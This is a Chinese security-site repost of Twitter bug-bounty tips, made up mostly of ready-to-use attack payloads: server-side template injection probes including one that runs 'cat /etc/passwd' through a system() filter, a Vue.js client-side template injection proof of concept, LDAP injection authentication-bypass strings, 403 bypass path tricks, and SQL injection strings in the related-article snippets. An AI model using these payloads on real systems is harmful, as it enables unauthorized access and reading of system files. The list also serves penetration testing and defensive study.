<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    Twitter滲透技巧搬運工(二)

    VSole2022-06-05 04:50:20


    SSTI payloads

    {2*2}[[7*7]]
{{7*7}}
{{7*'7'}}
<%= 7 * 7 %>
{{ request }}
{{self}}
{{dump(app)}}
#{3*3}
#{ 3 * 3 }
{{ ''.__class__.__mro__[2].__subclasses__() }}
{{['cat%20/etc/passwd']|filter('system')}}

    原文地址:https://twitter.com/_bughunter/status/1522619419024887809?s=20&t=zoXT_4ZQw1vSYFjj1Lg_vA

    Vue.js Javascript 庫客戶端模板注入

    [PoC]


    hxxp://host/?name={{this.constructor.constructor('alert("foo")')()}}


    原文地址:https://twitter.com/wugeej/status/1354312840681668610?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

    bypass OTP二次驗證技巧


    原文地址:https://twitter.com/nxtexploit/status/1524601440635060225?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

    bypassing endpoints


    原文地址:https://twitter.com/beginnbounty/status/1520420265087610880?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

    LDAP injection auth bypasses:)


    1. *
2. *)(&
3. *)(|(&
4. pwd)
5. *)(|(*
6. *))%00
7. admin)(&)

    原文地址:https://twitter.com/ManasH4rsh/status/1520653543119593472?s=20&t=0hdMZw-sjWsIgybZ0wY4XA


    403 Forbidden bypass


    GET /admin ==> 403 Forbidden
GET /blablabal/%2e%2e/admin ==> 200 OK
GET /blablabal/..;/admin ==> 200 OK 
GET /blablabal/;/admin ==> 200 OK
GET /blablabal/admin/..;/ ==> 200 OK
GET /admin?access=1 ==> 200 OK

    原文地址:https://twitter.com/_bughunter/status/1525874647652237312?s=20&t=3pL0jy_ZrHfU_Wl055b7vg

    httpstwitter
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    干貨 | Twitter滲透技巧搬運工
    2022-08-16 06:46:31
    快速檢測有無SQL注入' OR 1=1--. 獲取憑證訪問密鑰?將標頭更改為這樣并觀察響應
    Twitter滲透技巧搬運工(二)
    2022-06-05 04:50:20
    {2*2}[[7*7]] {{7*7}} {{7*'7'}} <%= 7 * 7 %> {{ request }} {{self}} {{dump(app)}} #{3*3} #{ 3 * 3 } {{ ''.__class__.__mro__[2].__subclasses__() }} {{['cat%20/etc/passwd']|filter('system')}}
    Twitter滲透技巧搬運工
    2022-05-18 07:38:15
    Twitter滲透技巧搬運工
    Twitter滲透技巧搬運工(一)
    2022-05-13 07:19:14
    ' OR 1=1-- ' OR 1=0-- %27%20or%201=1 *(|(object=*)) )%20or%20('x'='x %20or%201=1 1) or pg_sleep(__TIME__)-- /**/or/**/1/**/=1 ' or username like '% );waitfor delay '0:0:__TIME__'-- or isNULL(1/0) /* x
    Twitter認證賬戶被黑,并發送釣魚信息
    2022-07-04 22:17:38
    威脅行為者正在入侵經過驗證的 Twitter 帳戶,以發送虛假但編寫良好的暫停消息,試圖竊取其他經過驗證的用戶的憑據。
    提供一個0day(CVE)挖掘思路(可能)
    2021-09-02 19:32:02
    最近在Twitter看到國外黑闊jonhat披露的雷蛇的0day漏洞,該漏洞只要接入雷蛇的鼠標或鍵盤等外設安裝驅動就能直接提權到system權限,快來了解一下吧
    干貨 | 域滲透之域持久性:Shadow Credentials
    2022-05-06 08:30:13
    屬性,以獲得用于檢索 NTLM 哈希值和請求 TGT 票據。PKINIT 是 Kerberos 協議的擴展協議,允許在身份驗證階段使用數字證書。KDC 擁有客戶端密鑰的副本,并且可以解密預身份驗證的數據以對客戶端進行認證。
    $8000賞金獎勵:Opera瀏覽器從XSS 到 RCE
    2022-01-18 14:28:25
    從XSS到RCE,終獲8000美刀獎勵~
    俄羅斯鐵路網站被烏克蘭黑客關閉
    2023-07-24 09:54:43
    俄羅斯國有鐵路公司RZD周三表示(https://t.me/telerzd/3338),由于“大規模”網絡攻擊,其網站和移動應用程序關閉了幾個小時,迫使乘客只能在火車站購買車票。烏克蘭黑客組織IT Army(https://t.me/c/1764189517/294560)在其Telegram頻道上聲稱對此次攻擊負責。“我們的目標不是永久關閉該網站。準備對此類目標的攻擊需要付出巨大的努力,“IT
    CVE-2021-35052:WinRAR遠程代碼執行漏洞分析
    2021-11-04 10:56:15
    WinRAR是一款功能強大的壓縮包管理工具,廣泛應用于Windows系統的RAR、ZIP等類型的壓縮文件的創建與解壓中。2021年10月20日,Positive Technologies公司的Psych0tr1a(https://twitter.com/Psych0tr1a)公開披露WinRAR 5.70試用版及以前版本存在遠程代碼執行漏洞,此漏洞允許攻擊者攔截和修改發送給用戶的請求,以達到執行遠
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类